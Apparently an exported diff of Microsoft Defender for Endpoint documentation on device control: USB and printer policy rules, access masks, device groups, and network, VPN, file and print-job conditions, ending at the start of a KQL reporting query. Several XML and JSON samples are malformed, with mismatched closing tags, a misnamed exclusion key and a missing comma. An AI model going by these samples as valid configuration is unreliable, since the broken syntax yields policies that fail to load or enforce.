-| Read only access for USBs | All Removable storage devices | Writeable USBs | Read Only Access |
-| Write access for USBs | Writeable USBs | | Write Access |
-
-The name of the rule appears in the portal for reporting and in the toast notification to users, so make sure to give the rules descriptive names.
-
-You can configure rules by editing policies in Intune, using an XML file in Windows, or using a JSON file on Mac. Select each tab for more details.
-
-### [**Intune**](#tab/Removable)
-
-The following image depicts configuration settings for a device control policy in Intune:
--
-In the screenshot, the Included ID and Excluded ID are the references to included and excluded reusable settings groups. A policy can have multiple rules.
-
-Intune doesn't honor the ordering of the rules. The rules can be evaluated in any order, so make sure to explicitly exclude groups of devices that aren't in scope for the rule.
-
-### [**XML (Windows)**](#tab/XML)
-
-The following code snippet shows the syntax for a device control policy rule in XML:
-
-```xml
-
-<PolicyRule Id="{75a4e33a-5268-4552-bef2-e34dd0c39cb1}">
- <Name>Read Only Access for USBs</Name>
- <IncludedIdList>
- <GroupId>{3f5253e4-0e73-4587-bb9e-bb29a2171694}</GroupId>
- </IncludedIdList>
- <ExcludedIdList>
- <GroupId>{3f5253e4-0e73-4587-bb9e-bb29a2171695}</GroupId>
- <ExcludedIdList>
- <Entry Id="{e3837e60-5e56-43ce-8095-043ccd793eac}">
- ...
- </Entry>
- <Entry Id="{34413b98-8198-4e16-accf-c95c3c775ba3}">
- ...
- </Entry>
-</PolicyRule>
-
-```
-
-The following table provides more context for the XML code snippet:
-
-| Property Name | Description | Options |
-||||
-| `PolicyRule Id` | GUID, a unique ID, represents the policy and is used in reporting and troubleshooting. | You can generate the ID through [PowerShell](/powershell/module/microsoft.powershell.utility/new-guid). |
-| `Name` | String, the name of the policy and displays on the toast based on the policy setting. | |
-| `IncludedIdList` | The groups that the policy applies to. If multiple groups are added, the media must be a member of each group in the list to be included. | The Group ID/GUID must be used at this instance. <br/><br/>The following example shows the usage of GroupID: `<IncludedIdList> <GroupId> {EAA4CCE5-F6C9-4760-8BAD-FDCC76A2ACA1}</GroupId> </IncludedIdList>` |
-| `ExcludedIDList` | The groups that the policy doesn't apply to. If multiple groups are added, the media must be a member of a group in the list to be excluded. | The Group ID/GUID must be used at this instance. |
-| `Entry` | One PolicyRule can have multiple entries; each entry with a unique GUID tells device control one restriction. | See Entry properties table below to get details. |
-
-### [**JSON (Mac)**](#tab/JSON)
-
-The following code snippet shows the syntax for a device control policy rule in JSON for macOS:
-
-```json
-{
- "id": "75a4e33a-5268-4552-bef2-e34dd0c39cb1",
- "name": "Read Only Access for USBs",
- "includeGroups": [
- "3f5253e4-0e73-4587-bb9e-bb29a2171694"
- ],
- "includedGroups":[
- "3f5253e4-0e73-4587-bb9e-bb29a2171695"
- ]
- "entries": [
- ...
- ]
- }
-
-```
-
-The following table provides more context for the XML code snippet:
-
-| Property name | Description | Options |
-||||
-| `id` | GUID, a unique ID, represents the rule and is used in the policy. | `New-Guid (Microsoft.PowerShell.Utility) - PowerShell<br/>uuidgen` |
-| `name` | String, name of the policy and displays on the toast based on the policy setting. | |
-| `includeGroups` | The groups that the policy is applied to. If multiple groups are specified, the policy applies to any media in all those groups. If not specified, the rule applies to all devices. | The ID value inside the group must be used in this instance. If multiple groups are in the includeGroups, it's `AND`. <br/> `"includeGroups": ["3f082cd3-f701-4c21-9a6a-ed115c28e217"]` |
-| `excludeGroups` | The group that the policy doesn't apply to. | The `id` value inside the group must be used in this instance. If multiple groups are in the excludeGroups, it's `OR`. |
-| `entries` | One rule can have multiple entries; each entry with a unique GUID tells Device Control one restriction. | See entry properties table later in this article to get the details. |
---
-## Entries
-
-Device control policies define access (called an entry) for a set of devices. Entries define the action and notification options for devices that match the policy and the conditions defined in the entry.
-
-| Entry setting | Options |
-|||
-| AccessMask | Applies the action only if the access operations match the access mask - The access mask is the bit-wise OR of the access values:<br><br> 1 - Device Read<br>2 - Device Write<br>4 - Device Execute<br>8 - File Read<br>16 - File Write<br>32 - File Execute<br>64 - Print<br><br>For example:<br>Device Read, Write, and Execute = 7 (1+2+4)<br>Device Read, Disk Read = 9 (1+8)<br>
-| Action | Allow <br/> Deny <br/> AuditAllow <br/> AuditDeny |
-| Notification | None (default) <br/> An event is generated <br/> The user receives notification <br/> File evidence is captured |
-
-> [!WARNING]
-> The [February 2024](microsoft-defender-antivirus-updates.md#february-2024-engine-11240209--platform-418240207) release causes inconsistent results for device control customers who are using removable media policies with disk/device-level access only (masks that are less than or equal to 7). Enforcement might not work as expected. To mitigate this issue, rolling back to the previous version is recommended.
-
-If device control is configured, and a user attempts to use a device that's not allowed, the user gets a notification that contains the name of the device control policy and the name of the device. The notification appears once every hour after initial access is denied.
-
-An entry supports the following optional conditions:
--- User/User Group Condition: Applies the action only to the user/user group identified by the SID-
-> [!NOTE]
-> For user groups and users that are stored in Microsoft Entra Id, use the object id in the condition. For user groups and users that are stored localy, use the Security Identifier (SID)
-
-> [!NOTE]
-> On Windows, The SID of the user who's signed in can be retrieved by running the PowerShell command `whoami /user`.
--- Machine Condition: Applies the action only to the device/group identified by the SID-- Parameters Condition: Applies the action only if the parameters match (See Advanced Conditions)-
-Entries can be further scoped to specific users and devices. For example, allow read access to these USBs for this user only on this device.
-
-| Policy | Included Device Groups | Excluded Device Groups | Entry(ies) |
-|||||
-| Read only access for USBs | All Removable storage devices | Writeable USBs | Read Only Access |
-| Write access for USBs | Writeable USBs | | Write Access for User 1<br/><br/>Write Access for User 2 on Device Group A |
-
-All of the conditions in the entry must be true for the action to be applied.
-
-You can configure entries using Intune, an XML file in Windows, or a JSON file on Mac. Select each tab for more details.
-
-### [**Intune**](#tab/Removable)
-
-In Intune, the **Access mask** field has options, such as:
--- **Read** (Disk Level Read = 1)-- **Write** (Disk Level Write = 2)-- **Execute** (Disk Level Execute = 4)-- **Print** (Print = 64).-
-Not all features are shown in the Intune user interface. For more information, see [Deploy and manage device control with Intune](device-control-deploy-manage-intune.md).
-
-### [**XML (Windows)**](#tab/XML)
-
-The following code snippet shows the syntax for a device control entry in XML:
-
-```xml
-
- <Entry Id="{e3837e60-5e56-43ce-8095-043ccd793eac}">
- <Type>Allow</Type>
- <Options>0</Options>
- <AccessMask>1</AccessMask>
- </Entry>
-
-```
-
-The following table provides more context for the XML code snippet:
-
-| Property name | Description | Option |
-||||
-| `Entry Id` | GUID, a unique ID, represents the entry and is used in reporting and troubleshooting. | You can generate the GUID by using PowerShell. |
-| `Type` | Defines the action for the removable storage groups in `IncludedIDList`. <br/>- `Allow` <br/>- `Deny` <br/>- `AuditAllowed`: Defines notification and event when access is allowed <br/>- `AuditDenied`: Defines notification and event when access is denied; works together with a `Deny` entry. <br/><br/>When there are conflict types for the same media, the system applies the first one in the policy. An example of a conflict type is `Allow` and `Deny`. | - `Allow` <br/>- `Deny` <br/>- `AuditAllowed` <br/>- `AuditDenied` |
-| `Option` | If type is `Allow` | - `0`: nothing <br/>- `4`: disable `AuditAllowed` and `AuditDenied` for this entry. If `Allow` occurs and the `AuditAllowed` setting is configured, events aren't generated.<br/>- `8`: create a copy of the file as evidence, and generate a `RemovableStorageFileEvent` event. This setting must be used together with the **Set location for a copy of the file** setting in [Intune](device-control-deploy-manage-intune.md) or [Group Policy](device-control-deploy-manage-gpo.md). |
-| `Option` | If type is `Deny` | - `0`: nothing <br/>- `4`: disable `AuditDenied` for this Entry. If Block occurs and the `AuditDenied` is setting configured, the system doesn't show notifications. |
-| `Option` | If type is `AuditAllowed` | - `0`: nothing<br/>- `1`: nothing <br/>- `2`: send event |
-| `Option` | If type is `AuditDenied` | - `0`: nothing <br/>- `1`: show notification <br/>- `2`: send event <br/>- `3`: show notification and send event |
-| `AccessMask` | Defines the access | See the following section [Understand mask access](#understand-mask-access-windows) |
-| `Sid` | Local user SID or user SID group, or the SID of the Microsoft Entra object or the Object ID. It defines whether to apply this policy over a specific user or user group. One entry can have a maximum of one SID and an entry without any SID means to apply the policy over the device. | SID |
-| `ComputerSid` | Local computer SID or computer SID group, or the SID of the Microsoft Entra object or the Object Id. It defines whether to apply this policy over a specific device or device group. One entry can have a maximum of one ComputerSID and an entry without any ComputerSID means to apply the policy over the device. If you want to apply an Entry to a specific user and specific device, add both SID and ComputerSID into the same Entry. | SID |
-| `Parameters` | Condition for an entry, such as network condition. | Can add groups (non-device types) or even put parameters into parameters. For more information, see the [advanced conditions](#advanced-conditions) section (in this article). |
-
-#### Understand mask access (Windows)
-
-Device control applies an access mask to determine if the request matches the entry. The following actions are available on `CdRomDevices`, `RemovableMediaDevices`, and `WpdDevices`:
-
-| Access | Mask |
-|--|--|
-| Disk level read | 1 |
-| Disk level write | 2 |
-| Disk level execute | 4 |
-| File system read | 8 |
-| File system write | 16 |
-| File system execute | 32 |
-
-The following actions are available on PrinterDevices:
--- Access: Print-- Mask: 64-
-You can have multiple access settings by performing a binary OR operation. Here's an example:
--- The AccessMask for Read and Write and Execute is 7-- The AccessMask for Read and Write is 3-
-### [**JSON (Mac)**](#tab/JSON)
-
-The following code snippet shows the syntax for a device control entry in JSON for macOS:
-
-```json
-
-{
- "$type": "generic",
- "id": "e3837e60-5e56-43ce-8095-043ccd793eac",
- "enforcement": {
- "$type": "allow"
- },
- "access": [
- "generic_read"
- ]
-}
-
-```
-
-The following table provides more context for the JSON code snippet:
-
-| Property name | Description | Options |
-||||
-| `id` | GUID, a unique ID, represents the entry and is used in reporting and troubleshooting. | You can generate the ID by using PowerShell. |
-| `enforcement $type` | Defines the action for the removable storage groups in `includedGroups`. <br/>- `allow` <br/>- `deny` <br/>- `auditAllow`: Defines notification and event when access is allowed <br/>- `AuditDeny`: Defines notification and event when access is denied; has to work together with the Deny entry. <br/><br/>When there are conflict types for the same media, the system applies the first one in the policy. An example of a conflict type is Allow and Deny. | The `enforcement $type` attribute can be one of the following values:<br/>- `allow`<br/>- `deny`<br/>- `auditAllow`<br/>- `auditDeny` |
-| `enforcement $options` | If enforcement $type is allow | `disable_audit_allow`: If Allow occurs and the auditAllow is setting configured, the system doesn't send events. |
-| `enforcement $options` | If enforcement $type is deny | `disable_audit_deny`: If Block happens and the auditDeny is setting configured, the system doesn't show notifications or send events. |
-| `enforcement $options` | If enforcement $type is auditAllow | `send_event`: Sends telemetry |
-| `enforcement $options` | If enforcement $type is auditDeny | <br/>- `send_event`: Sends telemetry <br/>- `show_notification`: Displays block message to user |
-| `$type` | The type of entry. The type determines the operations that can be protected by device control | The `$type` attributes can be any of the following values:<br/>- `removableMedia`<br/>- `appleDevice`<br/>- `PortableDevice`<br/>- `bluetoothDevice` |
-| `access` | A list of operations that this entry grants | See the next section, "Understand access on Mac" |
-
-#### Understand access (Mac)
-
-There are two kinds of access for an entry: generic and device type specific.
--- Generic access options include `generic_read`, `generic_write`, and `generic_execute`.-- Device type specific access provides a finer granularity of control, because the device type specific access values are included in the generic access types.-
-The following table describes the device type specific access and how they map to the generic access types.
-
-| Device Type ($type) | Device Type Specific Access | Description | Read | Write | Execute |
-|||||||
-| `appleDevice` | `backup_device` | | X | | |
-| `appleDevice` | `update_device` | | | X | |
-| `appleDevice` | `download_photos_from_device` | download photo(s) from the specific iOS device to local device | X | | |
-| `appleDevice` | `download_files_from_device` | download file(s) from the specific iOS device to local device | X | | |
-| `appleDevice` | `sync_content_to_device` | sync content from local device to specific iOS device | | X | |
-| `portableDevice` | `download_files_from_device` | X | | |
-| `portableDevice` | `send_files_to_device` | | | X | |
-| `portableDevice` | `download_photos_from_device` | | X | | |
-| `portableDevice` | `debug` | ADB tool control | | | X |
-| `removableMedia` | `read` | | X | | |
-| `removableMedia` | `write` | | | X | |
-| `removableMedia` | `execute` | | | | X |
-| `bluetoothDevice` | `download_files_from_device` | | X | | |
-| `bluetoothDevice` | `send_files_to_device` | | | X | |
---
-## Groups
-
-Groups define criteria for filtering objects by their properties. The object is assigned to the group if its properties match the properties defined for the group.
-
-> [!NOTE]
-> Groups in this section **do not** refer to [user groups](#users).
-
-For example:
--- Allowed USBs are all the devices that match any of these manufacturers-- Lost USBs are all the devices that match any of these serial numbers-- Allowed printers are all the devices that match any of these VID/PID-
-The properties can be matched in four ways: `MatchAll`, `MatchAny`, `MatchExcludeAll`, and `MatchExcludeAny`
--- `MatchAll`: The properties are an "And" relationship; for example, if administrator puts `DeviceID` and `InstancePathID`, for every connected USB, the system checks to see whether the USB meets both values.-- `MatchAny`: The properties are an "Or" relationship; for example, if administrator puts DeviceID and `InstancePathID`, for every connected USB, the system enforces as long as the USB has either an identical `DeviceID` or `InstanceID` value.-- `MatchExcludeAll`: The properties are an "And" relationship, any items that do NOT meet are covered. For example, if administrator puts `DeviceID` and `InstancePathID` and uses `MatchExcludeAll`, for every connected USB, system enforces as long as the USB doesn't have both identical `DeviceID` and `InstanceID` value.-- `MatchExcludeAny`: The properties are an "Or" relationship, any items that do NOT meet are covered. For example, if administrator puts `DeviceID` and `InstancePathID` and uses `MatchExcludeAny`, for every connected USB, system enforces as long as the USB doesn't have either an identical `DeviceID` or `InstanceID` value.-
-Groups are used two ways: to select devices for inclusion/exclusion in rules, and to filter access for advanced conditions. This table summarizes the group types and how they're used.
-
-| Type | Description | O/S | Include/Exclude Rules | Advanced conditions |
-||||||
-| Device (default) | Filter devices and printers | Windows/Mac | X | |
-| Network | Filter network conditions | Windows | | X |
-| VPN Connection | Filter VPN conditions | Windows | | X |
-| File | Filter file properties | Windows | | X |
-| Print Job | Filter properties of the file being printed | Windows | | X |
-
-The devices that are in scope for the policy determined by a list of included groups and a list of excluded groups. A rule applies if the device is in all of the included groups and none of the excluded groups. Groups can be composed from the properties of devices. The following properties can be used:
-
-| Property | Description | Windows devices | Mac devices | Printers |
-||||||
-| `FriendlyNameId` | The friendly name in Windows Device Manager | Y | N | Y |
-| `PrimaryId` | The type of the device | Y | Y | Y |
-| `VID_PID` | Vendor ID is the four-digit vendor code that the USB committee assigns to the vendor. Product ID is the four-digit product code that the vendor assigns to the device. Wildcards are supported. For example, `0751_55E0` | Y | N | Y |
-`PrinterConnectionId` | The type of printer connection: <br/>- USB<br/>- Corporate<br/>- Network<br/>- Universal<br/>- File<br/>- Custom<br/>- Local | N | N | Y |
-| `BusId` | Information about the device (for more information, see the sections that follow this table) | Y | N | N |
-| `DeviceId` | Information about the device (for more information, see the sections that follow this table) | Y | N | N |
-| `HardwareId` | Information about the device (for more information, see the sections that follow this table) | Y | N | N |
-| `InstancePathId` | Information about the device (for more information, see the sections that follow this table) | Y | N | N |
-| `SerialNumberId` | Information about the device (for more information, see the sections that follow this table) | Y | Y | N |
-| `PID` | Product ID is the four-digit product code that the vendor assigns to the device | Y | Y | N |
-| `VID` | Vendor ID is the four-digit vendor code that the USB committee assigns to the vendor. | Y | Y | N |
-| `APFS Encrypted` | If the device is APFS encrypted | N | Y | N |
-
-### Using Windows Device Manager to determine device properties
-
-For Windows devices, you can use Device Manager to understand the properties of devices.
-
-1. Open Device Manager, locate the device, right-click on **Properties**, and then select the **Details** tab.
-
-2. In the Property list, select **Device instance path**.
-
- The value shown for device instance path is the `InstancePathId`, but it also contains other properties:
-
- - `USB\VID_090C&PID_1000\FBH1111183300721`
- - `{BusId}\{DeviceId}\{SerialNumberId}`
-
- The properties in the device manager map to device control as shown in the following table:
-
- | Device Manager | Device Control |
- |||
- | Hardware Ids | `HardwareId` |
- | Friendly name | `FriendlyNameId` |
- | Parent | `VID_PID` |
- | DeviceInstancePath | `InstancePathId` |
-
-### Using reports and advanced hunting to determine properties of devices
-
-Device properties have slightly different labels in advanced hunting. The table below maps the labels in the portal to the `propertyId` in a device control policy.
-
-| Microsoft Defender Portal property | Device control property Id |
-|||
-| Media name | `FriendlyNameId` |
-| Vendor Id | `HardwareId` |
-| DeviceId | `InstancePathId` |
-| Serial Number | `SerialNumberId` |
-
-> [!NOTE]
-> Make sure that the object selected has the correct Media Class for the policy. In general, for removable storage, use `Class Name == USB`.
-
-### Configure groups in Intune, XML in Windows, or JSON on Mac
-
-You can configure groups in Intune, by using an XML file for Windows, or by using a JSON file on Mac. Select each tab for more details.
-
-> [!NOTE]
-> The `Group Id` in XML and `id` in JSON is used to identify the group within device control. Its not a reference to any other such as a [user group](#users) in Entra Id.
-
-### [**Intune**](#tab/Removable)
-
-Reusable settings in Intune map to device groups. You can configure reusable settings in Intune.
--
-There are two types of groups: Printer Device and Removable Storage. The following table lists the properties for these groups.
-
-| Group type | Properties |
-|||
-| Printer device | - `FriendlyNameId`<br/>- `PrimaryId`<br/>- `PrinterConnectionId`<br/>- `VID_PID` |
-| Removable storage | - `BusId` <br/>- `DeviceId`<br/>- `FriendlyNameId`<br/>- `HardwareId`<br/>- `InstancePathId`<br/>- `PID`<br/>- `PrimaryId`<br/>- `SerialNumberId`<br/>- `VID`<br/>- `VID_PID` |
-
-### [**XML (Windows)**](#tab/XML)
-
-The following XML snippet shows the syntax for matching groups:
-
-```xml
-
-<Group Id="{3f5253e4-0e73-4587-bb9e-bb29a2171694}">
- <MatchType>MatchAny</MatchType>
- <DescriptorIdList>
- ...
- </DescriptorIdList>
-</Group>
-
-```
-
-The following table describes properties for groups.
-
-| Property Name | Description | Options |
-||||
-| `Group Id` | GUID, a unique ID, represents the group and to be used in the policy. | You can generate the ID through PowerShell. |
-| `Type` | The type of the group | Device (Default) <br/><br/>The other types of groups (`File`, `VPNConnection`, `PrintJob`, `Network`) can be used for advanced conditions. The type for groups used with rules is `Device`, which is the default. |
-| `MatchType` | The matching algorithm used | - `MatchAny`<br/>- `MatchAll`<br/>- `MatchExcludeAll`<br/>- `MatchExcludeAny` |
-| `DescriptionIdList` | The list of properties evaluated for inclusion in the group | See [DescriptionIdList properties](#descriptionidlist-properties) (section after this table) |
-
-#### DescriptionIdList properties
-
-The properties described in the following table can be included in the `DescriptionIdList`:
-
-| Property | Description |
-|||
-| `PrimaryId` | Includes `RemovableMediaDevices`, `CdRomDevices`, `WpdDevices`, and `PrinterDevices`.|
-| `InstancePathId` | String that uniquely identifies the device in the system, for example, `USBSTOR\DISK&VEN_GENERIC&PROD_FLASH_DISK&REV_8.07\8735B611&0`. It corresponds to the device instance path in Device Manager in Windows. The number at the end (for example `&0`) represents the available slot and might change from device to device. For best results, use a wildcard at the end. For example, `USBSTOR\DISK&VEN_GENERIC&PROD_FLASH_DISK&REV_8.07\8735B611*`. |
-| `DeviceId` | To transform Device instance path to Device ID format, use Standard USB Identifiers, such as this example: `USBSTOR\DISK&VEN_GENERIC&PROD_FLASH_DISK&REV_8.07` |
-| `HardwareId` | String that identifies the device in the system, like `USBSTOR\DiskGeneric_Flash_Disk___8.07`. It corresponds to the hardware ID in Device Manager in Windows. Keep in mind that `HardwareId` isn't unique; different devices might share the same value. |
-| `FriendlyNameId` | String attached to the device, like `Generic Flash Disk USB Device`. It corresponds to the friendly name in Device Manager in Windows. |
-| `BusId` | For example, `USB`, `SCSI` |
-| `SerialNumberId` | You can find `SerialNumberId` from Device instance path in Device Manager in Windows. For example, `03003324080520232521` is `SerialNumberId` in `USBSTOR\DISK&VEN__USB&PROD__SANDISK_3.2GEN1&REV_1.00\03003324080520232521&0` |
-| `VID_PID` | - Vendor ID is the four-digit vendor code that the USB committee assigns to the vendor. <br/>- Product ID is the four-digit product code that the vendor assigns to the device. It supports wildcards.<br/>- To transform Device instance path to Vendor ID and Product ID format, use Standard USB Identifiers. Here are some examples: <br/>`0751_55E0`: match this exact VID/PID pair <br/>`_55E0`: match any media with `PID=55E0` <br/>`0751_`: match any media with `VID=0751` |
-
-Here are some examples of device group definitions in the device control samples repository:
--- [Group of devices by Instance Path Id](https://github.com/microsoft/mdatp-devicecontrol/blob/c43f0ee80702f0a24f48b1d0f8302dd30a230586/Removable%20Storage%20Access%20Control%20Samples/Group%20Policy/Approved%20USBs%20Group.xml#L2)-- [Group of devices by VID_PID](https://github.com/microsoft/mdatp-devicecontrol/blob/c43f0ee80702f0a24f48b1d0f8302dd30a230586/Removable%20Storage%20Access%20Control%20Samples/Intune%20OMA-URI/Unapproved%20USBs%20Group.xml#L2)-- [Group of devices by Primary Id](https://github.com/microsoft/mdatp-devicecontrol/blob/c43f0ee80702f0a24f48b1d0f8302dd30a230586/Removable%20Storage%20Access%20Control%20Samples/Group%20Policy/Any%20Removable%20Storage%20and%20CD-DVD%20and%20WPD%20Group.xml)-
-### [**JSON (Mac)**](#tab/JSON)
-
-The following JSON snippet shows the syntax for defining groups on Mac:
-
-```json
-
- {
- "$type": "device",
- "id": "3f5253e4-0e73-4587-bb9e-bb29a2171694",
- "query": {
- "$type": "or",
- "clauses": [
- ...
- ]
- }
- }
-
-```
-
-The following table describes properties for groups:
-
-| Property | Description | Options |
-||||
-| `$type` | The kind of group | device |
-| `id` | GUID, a unique ID, represents the group to be used in the policy. | You can generate the ID by using the Windows PowerShell [New-Guid](/powershell/module/microsoft.powershell.utility/new-guid) cmdlet or the `uuidgen` command on macOS |
-| `name` | Friendly name for the group. | string |
-| `query` | The media coverage under this group | See the query properties tables below for details. |
-
-The query supports all, and (same as all), any, or (same as any) types. This is the logic used to combine the properties in the clauses.
-
-The following values are supported as clauses:
-
-| Clause `$type` | Value | Description |
-||||
-| `primaryId` | One of: <br/>- `apple_devices`<br/>- `removable_media_devices`<br/>- `portable_devices`<br/>- `bluetooth_devices` |
-| `vendorId` | four-digit hexadecimal string | Matches a device's vendor ID |
-| `productId` | four-digit hexadecimal string | Matches a device's product ID |
-| `serialNumber` | string | Matches a device's serial number. Doesn't match if the device doesn't have a serial number. |
-| `encryption` | apfs | Match if a device is apfs-encrypted. |
-| `groupId` | UUID string | Match if a device is a member of another group. The value represents the UUID of the group to match against. The group must be defined within the policy prior to the clause. |
-
-Here's an example query:
-
-```JSON
-
-"query": {
- "$type": "or",
- "clauses": [
- {
- "$type": "serialNumber",
- "value": "FBH1111183300731"
- }
- ]
- }
-
-```
-
-Our example query can be edited to get behavior equivalent to the ExcludedMatchAll and ExcludedMatchAny by using the "not" type, as follows:
-
-```json
-
-"query": {
- "$type":"not",
- "query": {
- "$type": "or",
- "clauses": [
- {
- "$type": "serialNumber",
- "value": "FBH1111183300731"
- }
- ]
- }
-
-}
-
-```
-
-This query matches all devices that don't have the specified serial number.
---
-## Advanced conditions
-
-Entries can be further restricted based on parameters. Parameters apply advanced conditions that go beyond the device. Advanced conditions allow for fine-grained control based on Network, VPN Connection, File or Print Job being evaluated.
-
-> [!NOTE]
-> Advanced conditions are only supported in the XML format.
-
-### Network Conditions
-
-The following table describes network group properties:
-
-| Property | Description |
-|||
-| `NameId` | The name of the network. Wildcards are supported. |
-| `NetworkCategoryId` | Valid options are `Public`, `Private`, or `DomainAuthenticated`. |
-| `NetworkDomainId` | Valid options are `NonDomain`, `Domain`, `DomainAuthenticated`. |
-
-These properties are added to the DescriptorIdList of a group of type Network. Here's an example snippet:
-
-```xml
-
-<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30a}" Type="Network" MatchType="MatchAll">
- <DescriptorIdList>
- <NetworkCategoryId>Public</PathId>
- <NetworkDomainId>NonDomain</PathId>
- </DescriptorIdList>
-</Group>
-
-```
-
-The group is then referenced as parameters in the entry, as illustrated in the following snippet:
-
-```xml
-
- <Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}">
- <Type>Deny</Type>
- <Options>0</Options>
- <AccessMask>40</AccessMask>
- <Parameters MatchType="MatchAll">
- <Network MatchType="MatchAny">
- <GroupId>{ e5f619a7-5c58-4927-90cd-75da2348a30a }</GroupId>
- </Network>
- </Parameters>
- </Entry>
-
-```
-
-### VPN Connection Conditions
-
-The following table describes VPN connection conditions:
-
-| Name | Description |
-|||
-| `NameId` | The name of the VPN Connection. Wildcards are supported. |
-| `VPNConnectionStatusId` | Valid values are `Connected` or `Disconnected`. |
-| `VPNServerAddressId` | The string value of `VPNServerAddress`. Wildcards are supported. |
-| `VPNDnsSuffixId` | The string value of `VPNDnsSuffix`. Wildcards are supported. |
-
-These properties are added to the DescriptorIdList of a group of type VPNConnection, as shown in the following snippet:
-
-```xml
-
- <Group Id="{d633d17d-d1d1-4c73-aa27-c545c343b6d7}" Type="VPNConnection">
- <Name>Corporate VPN</Name>
- <MatchType>MatchAll</MatchType>
- <DescriptorIdList>
- <NameId>ContosoVPN</NameId>
- <VPNServerAddressId>contosovpn.*.contoso.com</VPNServerAddressId>
- <VPNDnsSuffixId>corp.contoso.com</VPNDnsSuffixId>
- <VPNConnectionStatusId>Connected</VPNConnectionStatusId>
- </DescriptorIdList>
- </Group>
-
-```
-
-Then the group is then referenced as parameters in an entry, as illustrated in the following snippet:
-
-```xml
-
- <Entry Id="{27c79875-25d2-4765-aec2-cb2d1000613f}">
- <Type>Allow</Type>
- <Options>0</Options>
- <AccessMask>64</AccessMask>
- <Parameters MatchType="MatchAny">
- <VPNConnection>
- <GroupId>{d633d17d-d1d1-4c73-aa27-c545c343b6d7}</GroupId>
- </VPNConnection>
- </Parameters>
- </Entry>
-
-```
-
-### File Conditions
-
-The following table describes file group properties:
-
-| Name | Description |
-|||
-| `PathId` | String, value of file path or name. <br/>Wildcards are supported. <br/>Only applicable for file type groups. |
-
-The following table illustrates how properties are added to the `DescriptorIdList` of a file group:
-
-```xml
-
-<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30f}" Type="File" MatchType="MatchAny">
- <DescriptorIdList>
- <PathId>*.exe</PathId>
- <PathId>*.dll</PathId>
- </DescriptorIdList>
-</Group>
-
-```
-
-The group is then referenced as parameters in an entry, as illustrated in the following snippet:
-
-```xml
-
- <Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}">
- <Type>Deny</Type>
- <Options>0</Options>
- <AccessMask>40</AccessMask>
- <Parameters MatchType="MatchAll">
- <File MatchType="MatchAny">
- <GroupId>{ e5f619a7-5c58-4927-90cd-75da2348a30f }</GroupId>
- </File>
- </Parameters>
- </Entry>
-
-```
-
-### Print Job Conditions
-
-The following table describes `PrintJob` group properties:
-
-| Name | Description |
-|||
-| `PrintOutputFileNameId` | The output destination file path for print to file. Wildcards are supported. For example, `C:\*\Test.pdf` |
-| `PrintDocumentNameId` | The source file path. Wildcards are supported. This path might not exist. For example, add text to a new file in Notepad, and then print without saving the file. |
-
-These properties are added to the `DescriptorIdList` of a group of type `PrintJob`, as illustrated in the following snippet:
-
-```xml
-
-<Group Id="{e5f619a7-5c58-4927-90cd-75da2348a30b}" Type="PrintJob" MatchType="MatchAny">
- <DescriptorIdList>
- <PrintOutputFileNameId>C:\Documents\*.pdf</PrintOutputFileNameId >
- <PrintDocumentNameId>*.xlsx</PrintDocumentNameId>
-<PrintDocumentNameId>*.docx</PrintDocumentNameId>
- </DescriptorIdList>
-</Group>
-
-```
-
-The group is then referenced as parameters in an entry, as illustrated in the following snippet:
-
-```xml
-
- <Entry Id="{1ecfdafb-9b7f-4b66-b3c5-f1d872b0961d}">
- <Type>Deny</Type>
- <Options>0</Options>
- <AccessMask>40</AccessMask>
- <Parameters MatchType="MatchAll">
- <PrintJob MatchType="MatchAny">
- <GroupId>{e5f619a7-5c58-4927-90cd-75da2348a30b}</GroupId>
- </PrintJob>
- </Parameters>
- </Entry>
-
-```
-
-## File evidence
-
-With device control, you can store evidence of files that were copied to removable devices or were printed. When file evidence is enabled, a `RemovableStorageFileEvent` is created. The behavior of file evidence is controlled by options on the Allow action, as described in the following table:
-
-| Option | Description |
-|||
-| `8` | Create a `RemovableStorageFileEvent` event with `FileEvidenceLocation` |
-| `16` | Create a `RemovableStorageFileEvent` without `FileEvidenceLocation` |
-
-The `FileEvidenceLocation` field of has the location of the evidence file, if one is created. The evidence file has a name which ends in `.dup`, and its location is controlled by the `DataDuplicationFolder` setting.
-
-## Next steps
--- [View device control events and information in Microsoft Defender for Endpoint](device-control-report.md)-- [Deploy and manage device control in Microsoft Defender for Endpoint with Microsoft Intune](device-control-deploy-manage-intune.md)-- [Deploy and manage device control in Microsoft Defender for Endpoint using Group Policy](device-control-deploy-manage-gpo.md)-- [Device Control for macOS](mac-device-control-overview.md)
security Device Control Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-report.md
- Title: View device control events and information in Microsoft Defender for Endpoint
-description: Monitor your organization's data security through device control reports.
- Previously updated : 02/01/2024--------- m365-security-- tier2-- mde-asr--
-# View device control events and information in Microsoft Defender for Endpoint
-
-Microsoft Defender for Endpoint device control helps protect your organization from potential data loss, malware, or other cyberthreats by allowing or preventing certain devices to be connected to users' computers. You can view information about device control events with advanced hunting or by using the device control report.
-
-To access the [Microsoft Defender portal](https://security.microsoft.com/advanced-hunting), your subscription must include Microsoft 365 for E5 reporting.
-
-Select each tab to learn more about advanced hunting and the device control report.
-
-## [**Advanced hunting**](#tab/advhunt)
-
-## Advanced hunting
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-When a device control policy is triggered, an event is visible with advanced hunting, regardless of whether it was initiated by the system or by the user who signed in. This section includes some example queries you can use in advanced hunting.
-
-### Example 1: Removable storage policy triggered by disk and file system level enforcement
-
-When a `RemovableStoragePolicyTriggered` action occurs, event information about the disk and file system level enforcement is available.
-
-> [!TIP]
-> Currently, in advanced hunting, there's a limit of 300 events per device per day for `RemovableStoragePolicyTriggered` events. Use the device control report to view additional data.
-
-```kusto
-
-//RemovableStoragePolicyTriggered: event triggered by Disk and file system level enforcement for both Printer and Removable storage based on your policy
-DeviceEvents
-| where ActionType == "RemovableStoragePolicyTriggered"
-| extend parsed=parse_json(AdditionalFields)
-| extend RemovableStorageAccess = tostring(parsed.RemovableStorageAccess)
-| extend RemovableStoragePolicyVerdict = tostring(parsed.RemovableStoragePolicyVerdict)
-| extend MediaBusType = tostring(parsed.BusType)
